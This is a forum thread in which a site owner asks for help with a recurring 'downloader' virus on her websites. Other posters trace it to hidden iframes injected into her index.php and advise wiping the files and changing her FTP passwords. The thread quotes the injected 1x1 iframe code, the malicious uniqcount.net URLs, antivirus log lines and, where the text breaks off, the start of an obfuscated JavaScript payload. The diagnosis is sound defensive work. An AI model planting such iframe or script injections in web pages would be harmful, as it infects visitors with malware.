My Websites Keep Getting A Downloader Virus

[MichelleStillCantType]

Hope this is the right pace to post this and someone can help. I had been running AVG alone until I got a couple of emails letting me know my sites had a virus. One was kind enough to let me know he was running Norton Internet Security. I bought it and sure enough, a downloader.

I can get rid of them for a couple of days by reuploading the index file and sometimes must also upload any php includes used on the index page. It keeps coming back though. My admin says it can't be my server.

Where do they come from, how do I stop them? The only help I get from Norton is how to remove a downloader from a computer. The problem is on my websites. Any help is so much appreciated. I'm lost.

[Webnauts]

Thread moved here in the "Internet Security Discussion Forum".

I hope you will get help here.

[Webnauts]

Quote:

Originally Posted by MichelleStillCantType

Where do they come from, how do I stop them? The only help I get from Norton is how to remove a downloader from a computer. The problem is on my websites. Any help is so much appreciated. I'm lost.

I would take the risk to check, if you would tell your site URL.

[MichelleStillCantType]

Thank you so much. I believe I have them clear again so you should be safe but I can't promise that. Like I said they go away for a bit after I upload a new index file but then they come back out of the blue. It is across my many sites.

www.enjoyportclinton.com
www.thelakeerieguide.com
www.ecampsite.com

there are more, please tell me if you would like the url's

[imvain2]

Well the virus is still there. I'm not sure which image is causing the problem, however the virus is stored in a cursor or animated image of some kind.

Info from the anti virus program that I use

It seems there is another virus that is ran through a WMF (windows meta file - like the ones commonly used in Word)

More info

[stevealmond]

I ran the risk as well, and yes the virus is still there along with the WMF virus.

Your server only serves up what you supply. If what you supply contains a virus, then your server will give it to the web. What you have uploaded to the server therefore must contain the viruses that we have found. So the answer to your question "where do they come from" is your own computer.

As you have recently bought Norton Internet Security I would suggest that you do a full system scan on your own PC using Norton and clear up any problems that are found. You then need to delete all the files from your server. You can do this from control panel if you have one, or by FTP. However it may be best to ask your admin to delete your files for you and reformat your web space, as viruses do have a nack of returning once killed. Then you should have a clean web space, and a clean computer from which to upload your files.

If your own computer doesn't have any problems, then just clean up your web space and upload everything again. If this doesn't cure the problem then you really do have a very weird problem.

Steve

[timmathews.com]

I got it too. I got 2 download viruses. Weird, I use AVG and it caught them. You say your AVG did not? Did you update it?

[visio]

actually I think it is some link you have to http://uniqcount.net/ the virus seems to come from the following two files:
http://uniqcount.net/adv/171/xpl.wmf
http://uniqcount.net/adv/171/count.jar\BlackBox.class

try to find where you link to this people and take off the link, then check again.

[dean]

Looks like this is going around. Check out this thread at Castlecops:
http://www.castlecops.com/t160127-Downloader_Virus.html

[imvain2]

It looks like the uniqcount is being pulled through iframes.

Code:

<iframe src='http://uniqcount.net/adv/new.php?adv=171' width=1 height=1></iframe>

<iframe src='http://uniqcount.net/adv/171/new.php' width=1 height=1></iframe>

What I did was, I used the w3 Validator (http://validator.w3.org/) and clicked the checkbox to view source. This way I can view the source without worrying about the virus. I'm sure there are many ways to accomplis that, but this way worked fine for me.

[imvain2]

Just to see what the website actually looks like, I added uniqcount.net to my hosts file and pointed it at 127.0.0.1. That way any request that my computer makes to retrieve content from uniqcount.net is really looking locally for the files therefor not downloading any virii.

[billa]

Try Windows Defender, which (I think) is still currently a free download.
I had a problem that I could not get rid for ages with different programs and the Defender (or to be accurate, the its older version)finally cracked it.
Amazingly enough, something good seems to have come out of the Microsoft stable...!

[edhan]

Time Module Object Name Threat Action User Information
9/26/2006 16:34:35 PM IMON file http://uniqcount.net/adv/171/sploit.anr Win32/TrojanDownloader.Ani.gen trojan Connection terminated 2765586738\home
9/26/2006 16:34:17 PM IMON archive http://uniqcount.net/adv/171/count.jar Java/ClassLoader.AA trojan Connection terminated 2765586738\home

Well, it is definitely confirmed that http://uniqcount.net has trojan. Remove it and you should be okay.

[wige]

A software program you might want to try is Paros Proxy. This (free) program is a proxy server that you install on your computer, which allows you to view both the requests your web browser is making as well as the responses from the server, see the exact headers, and change or even block requests. I use it mostly to test design changes but for your issue it will help you narrow down why these files are being pushed to the clients. You will be able to use it to block the virus files from downloading as you work to locate the virus.

A few questions I have because you mentioned that it goes away after you run the antivirus: Do you own the server, or is it at your location? Also, if you don't own the server, is it a dedicated or shared server? If you like I could give it a cursory analysis and see if I see anything that looks vulnerable in the site/server itself

[EArmand]

I would deep scan my PC, delete all files from server, change all passwords including your FTP and Hosting Account Passwords and republish clean copy of your website files to your server. I've had something similar to this happen to me and I was able to fix this by deleting the infected files and changing the password to prevent new infected files from being published to my server by the hacker.

[edhan]

Quote:

Originally Posted by EArmand

I would deep scan my PC, delete all files from server, change all passwords including your FTP and Hosting Account Passwords and republish clean copy of your website files to your server. I've had something similar to this happen to me and I was able to fix this by deleting the infected files and changing the password to prevent new infected files from being published to my server by the hacker.

Yes. I do agree with EArmand. That way will be completely eliminated any sign or existence of the worms, trojans or viruses in your server.

[MarkGatESS]

I haven't run into the problem of this virus/trojan myself (so far), but I took precautions by using the link that dean had posted for CastleCops.com and I blocked the IP address range (81.95.144.0 - 81.95.147.255) that I found on the site in our company firewall. Hopefully, this will prevent anything being downloaded to our machines that's causing this problem.

[Orion]

ask your host provider if they have anti-virus solution on their servers. Most shared hosting does not, but they should.
have the host delete the site then recreate it that should get rid of it, provided that the virus hasn't spread to the server, if it is you'll get it back again and your host provider will need to to a full scan and clean on their server(s).

[TrafficProducer]

Quote:

Got a couple of emails letting me know about a Virus

Be careful about emails about Viruses if from an unknown source.

These emails may be:

a) phishing
b) have viruses embeded or link to virus sites.
c) are tring to get you to buy software you may not need.
d) reporting Spoof viruses

[MichelleStillCantType]

I found it! I see the iframe with the http://uniqcount.net/adv/new.php?adv=171 url put into my index.php code. Thank you so much!

So basically this means I can solve the problem somewhat simply right?

Get my ftp username/pass changed and reupload new index files, correct?

Thank you again.

[fbnewtz]

Not only would I change your password for your FTP account, but I would make sure that you do not have any other unknown accounts setup that have FTP access.

I don't know if you have a management panel with your website that allows you to control user/email accounts and potentially make changes to components of your server configuration.

Good luck, and make sure your password is atleast 9 characters and has atleast one upper case letter and a number or symbol.

Fred

[wige]

Do you manage this server yourself or is it run by an outside company? If you own the server, you might want to invest in a vulnerability scanner that searches for and notifies you of possible weaknesses in the server. A free one is called Nessus from nessus.org (what can I say, I love free software) If your server is run by another company, they may knowingly and intentionally add the virus code to the pages they host. I have had it happen in the past with a web host forcing all sites to try to install spyware on visitor computers.

[MichelleStillCantType]

OK here is where I am so far in the event anyone else encounters this problem...

I downloaded an index file from my server and found two things in the code that I didn't put there.

iframe src='http://uniqcount.net/adv/new.php?adv=171' width=1 height=1
iframe src='http://uniqcount.net/adv/171/new.php' width=1 height=1

and the other is a java script...
script language blah blah blah
e = '0x00' + '36';str1 = "%8D%D5%DE%C3%A9%C4%C5%CE%DD%D2%8A%97%C3%DE%C4%DE% D7%DE%DD%DE%C5%CE%8F%D1%DE%D5%D5%D2%DB